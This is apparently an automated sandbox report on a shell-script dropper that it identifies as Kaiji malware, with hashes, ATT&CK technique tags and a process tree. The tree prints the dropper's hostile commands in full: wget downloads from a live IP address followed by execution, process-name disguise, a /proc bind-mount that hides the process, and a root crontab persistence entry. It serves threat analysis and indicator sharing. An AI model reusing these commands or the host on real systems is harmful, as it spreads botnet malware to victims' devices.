Analysis
-
max time kernel
149s -
max time network
147s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
16/04/2025, 18:46
Static task
static1
Behavioral task
behavioral1
Sample
download.sh
Resource
ubuntu1804-amd64-20250410-en
Behavioral task
behavioral2
Sample
download.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
download.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
download.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
download.sh
-
Size
2KB
-
MD5
544a2f391e2800bac07e883d902bcc75
-
SHA1
cea67c26c372d03b795bbba678569256385d3b83
-
SHA256
1dc484d51fb96c2097c2eb3695ff55d641e6778dbe8780cbbd0dbdfa688708ca
-
SHA512
f281a43fb6443bf15069aee5987d06d493bc0f0f47b927aea17115db168e6bf3271e5f37a0dc7f76defd21b60c24e513fcda0c2f109ce26f5bd4b802de184a4b
Malware Config
Signatures
-
Kaiji 2 IoCs
Kaiji payload
resource yara_rule behavioral4/files/fstream-1.dat Kaiji behavioral4/files/fstream-2.dat Kaiji -
Kaiji family
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 761 chmod 798 chmod -
Executes dropped EXE 4 IoCs
ioc pid Process /tmp/linux_mips 762 download.sh /tmp/linux_mipsel 799 download.sh /tmp/linux_mipsel 803 linux_mipsel /etc/32676 809 sh -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /etc/crontab sh -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself ksoftirqd/0 807 linux_mipsel -
Command and Scripting Interpreter: Unix Shell 1 TTPs 2 IoCs
Execute scripts via Unix Shell.
pid Process 808 sh 834 sh -
Enumerates kernel/hardware configuration 1 TTPs 33 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size linux_mipsel File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size linux_mipsel -
description ioc Process File opened for reading /proc/1/environ systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/filesystems systemctl -
System Network Configuration Discovery 1 TTPs 8 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 762 linux_mips 765 rm 767 rm 768 wget 799 linux_mipsel 803 linux_mipsel 720 rm 725 wget -
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/linux_mips wget File opened for modification /tmp/linux_mipsel wget
Processes
-
/tmp/download.sh/tmp/download.sh1⤵
- Executes dropped EXE
PID:716 -
/bin/unameuname -s2⤵PID:717
-
-
/bin/unameuname -m2⤵PID:719
-
-
/bin/rmrm -f linux_mips2⤵
- System Network Configuration Discovery
PID:720
-
-
/usr/bin/wgetwget -t 1 http://154.40.47.248:8000/linux_mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:725
-
-
/bin/chmodchmod +x linux_mips2⤵
- File and Directory Permissions Modification
PID:761
-
-
/tmp/linux_mips./linux_mips2⤵
- System Network Configuration Discovery
PID:762
-
-
/bin/rmrm -f linux_mips2⤵
- System Network Configuration Discovery
PID:765
-
-
/bin/rmrm -f linux_mipsel2⤵
- System Network Configuration Discovery
PID:767
-
-
/usr/bin/wgetwget -t 1 http://154.40.47.248:8000/linux_mipsel2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:768
-
-
/bin/chmodchmod +x linux_mipsel2⤵
- File and Directory Permissions Modification
PID:798
-
-
/tmp/linux_mipsel./linux_mipsel2⤵
- Executes dropped EXE
- Enumerates kernel/hardware configuration
- System Network Configuration Discovery
PID:799 -
/tmp/linux_mipsel./linux_mipsel " "3⤵
- Changes its process name
- Enumerates kernel/hardware configuration
- System Network Configuration Discovery
PID:803 -
/bin/sh/bin/sh -c "/etc/32676&"4⤵
- Executes dropped EXE
- Command and Scripting Interpreter: Unix Shell
PID:808
-
-
/usr/sbin/serviceservice crond start4⤵PID:810
-
/usr/bin/basenamebasename /usr/sbin/service5⤵PID:811
-
-
/usr/bin/basenamebasename /usr/sbin/service5⤵PID:813
-
-
/bin/systemctlsystemctl --quiet is-active multi-user.target5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:814
-
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:816
-
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"5⤵PID:817
-
-
/bin/systemctlsystemctl -p Triggers show dbus.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:818
-
-
/bin/systemctlsystemctl -p Triggers show ssh.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:819
-
-
/bin/systemctlsystemctl -p Triggers show syslog.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:820
-
-
/bin/systemctlsystemctl -p Triggers show systemd-fsckd.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:821
-
-
/bin/systemctlsystemctl -p Triggers show systemd-initctl.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:822
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-audit.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:823
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-dev-log.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:824
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:825
-
-
/bin/systemctlsystemctl -p Triggers show systemd-networkd.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:826
-
-
/bin/systemctlsystemctl -p Triggers show systemd-rfkill.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:827
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-control.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:828
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-kernel.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:830
-
-
-
/usr/local/sbin/systemctlsystemctl start crond.service4⤵PID:810
-
-
/usr/local/bin/systemctlsystemctl start crond.service4⤵PID:810
-
-
/usr/sbin/systemctlsystemctl start crond.service4⤵PID:810
-
-
/usr/bin/systemctlsystemctl start crond.service4⤵PID:810
-
-
/sbin/systemctlsystemctl start crond.service4⤵PID:810
-
-
/bin/systemctlsystemctl start crond.service4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:810
-
-
/bin/sh/bin/sh -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"4⤵
- Creates/modifies Cron job
- Command and Scripting Interpreter: Unix Shell
PID:834
-
-
/usr/bin/renicerenice -20 8034⤵PID:839
-
-
/bin/mountmount -o bind /tmp/ /proc/8034⤵PID:840
-
-
/usr/sbin/serviceservice cron start4⤵PID:841
-
/usr/bin/basenamebasename /usr/sbin/service5⤵PID:843
-
-
/usr/bin/basenamebasename /usr/sbin/service5⤵PID:844
-
-
/bin/systemctlsystemctl --quiet is-active multi-user.target5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:846
-
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:848
-
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"5⤵PID:849
-
-
/bin/systemctlsystemctl -p Triggers show dbus.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:854
-
-
/bin/systemctlsystemctl -p Triggers show ssh.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:855
-
-
/bin/systemctlsystemctl -p Triggers show syslog.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:858
-
-
/bin/systemctlsystemctl -p Triggers show systemd-fsckd.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:859
-
-
/bin/systemctlsystemctl -p Triggers show systemd-initctl.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:862
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-audit.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:864
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-dev-log.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:866
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:869
-
-
/bin/systemctlsystemctl -p Triggers show systemd-networkd.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:870
-
-
/bin/systemctlsystemctl -p Triggers show systemd-rfkill.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:873
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-control.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:875
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-kernel.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:877
-
-
-
/usr/local/sbin/systemctlsystemctl start cron.service4⤵PID:841
-
-
/usr/local/bin/systemctlsystemctl start cron.service4⤵PID:841
-
-
/usr/sbin/systemctlsystemctl start cron.service4⤵PID:841
-
-
/usr/bin/systemctlsystemctl start cron.service4⤵PID:841
-
-
/sbin/systemctlsystemctl start cron.service4⤵PID:841
-
-
/bin/systemctlsystemctl start cron.service4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:841
-
-
/bin/systemctlsystemctl start crond.service4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:880
-
-
-
-
/bin/rm/bin/rm /tmp/download.sh2⤵PID:804
-
-
/etc/32676/etc/326761⤵PID:809
-
/bin/sleepsleep 602⤵PID:812
-
-
/bin/sleepsleep 602⤵PID:910
-
-
/bin/sleepsleep 602⤵PID:921
-
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
34B
MD5f5a3713282e43c200f30342f5ff5e2ea
SHA12b2ce1a207e2b691a074c6f78f71c4785aae426a
SHA2566ab64e727571458d4884fb2fe82c27c467db0699cb8f648b3f0217c35d2b7511
SHA5125bcb8cd360409147a486755f90e0cdd97183af02ce8de5135b7c6a8a010deb9ef12dcd5ee9a2a8fd2e159347f68e72d6b7fd75e943b4fcd928d7a74b97476013
-
Filesize
41B
MD5b03c65123544e7d4af3d3db728b0c4d4
SHA1e32b964efbce48c2817f38e97be344c23b4d48e7
SHA256b29e13608838bdb20808aa6aaa14458f4a7484c9784575995d3bcac0e669f2ec
SHA5128cbd864bc70ff26b2b1d0ebde6341daa6df7c6033ec0d1114a74f3fb891a079722e857434f36967d853a8297854d29bec1f16ad1386f6d5148f0a26f9b330861
-
Filesize
90B
MD5198407eedf6bfd37808428ab3300a90a
SHA19994b48255824c0d4890ecdb0d2aed2aebb23de3
SHA2564a53e272e3438656c162ca067a2a82f95e90f1c308cad7e3bbb9e8fc054958d1
SHA512ffd55d7901a0a9a1416c3999535393179836edc863818422fad3b9781f132d6bee6738221cbe109a87cd5f17d9574fe744fd58bde33bd36bf133a766ef516cb1
-
Filesize
56B
MD5585f408444cbca746945f0cb63f2c3f0
SHA10e44bae17174f04514e770ca7fc4bec1007e39cd
SHA256ebb961c647363dfa90f302de378e0e61807b9b792fc86616635a713cca8f4299
SHA512022241dbafad55164701f67ef5b84154e3af97c5dfe77dee7bf8406f2befbd2962bbf4f243432b2f41d6c2376b87fcf551fd6945e03ddb02a5619c2f0f69c596
-
Filesize
913B
MD51bc5e4de95c269b22485334c81253569
SHA18c421ecfdb8d090037226adc45f45de8c847f629
SHA2562c6b57cdf813103c6e1db4e970c94378c2eaa362d94f3525afc3afb7249997b0
SHA512d46c0af72a1663fa64f87f8ca891e2b5463b6219939125a0f2a89b9c13413733fa5171c5cf04dcaf346d88e468d44f0fc31af26e32b901dad5a4aa0462553416
-
Filesize
2.2MB
MD55ec2f6c412ccfcc16781a7f3f37fb474
SHA1912cb18493577a0b5c64d994f4b6bc05990ae390
SHA256e58dffab271cd20cb6089017017d8e6c5f68c56c2b1877e8a94bbcdadcd4ef4c
SHA512ce37675e1ccfd0e7fdf2fe155473d94222ceb28cf8a3c797033617a07e7ce632240bdbb338d7c3aec5131a343d172a4d58a05e2558408e42b3eb80cf1767857f
-
Filesize
2.2MB
MD506a141032d508ea7639d82c044851727
SHA1e49bf29f0c21f0e5a5d0ccee733ed1626df57d6b
SHA256d3030e1575b48293f9364353127bd44892ec65120c11d1710eead510373aab55
SHA5128173fc77c9ba84dc1a980c907dec6d2a37e20b3dec5438189fb1990e6c161de5a7ebc033091be2bcd7b80fb1bfe1478eb9f81f6811c9417fd95d3419c9cc2e05
-
Filesize
240KB
MD5bb4edcad76062a76284c69f5fe4e50ea
SHA186055be4ce94fa3cffa9924e7b511e95df636606
SHA256b7e25e128c130473f33c5135c78f591f35d7c4a7c5e1246c12eaa298db453474
SHA512254acc62d2f83f5a4686adcf3fe6ad4697f392c288c5baa323830bb6f2466c303fd7bc9f237e98b2ca76bc3abb6b4c264e042be8c4291ae5cc21b2189d996521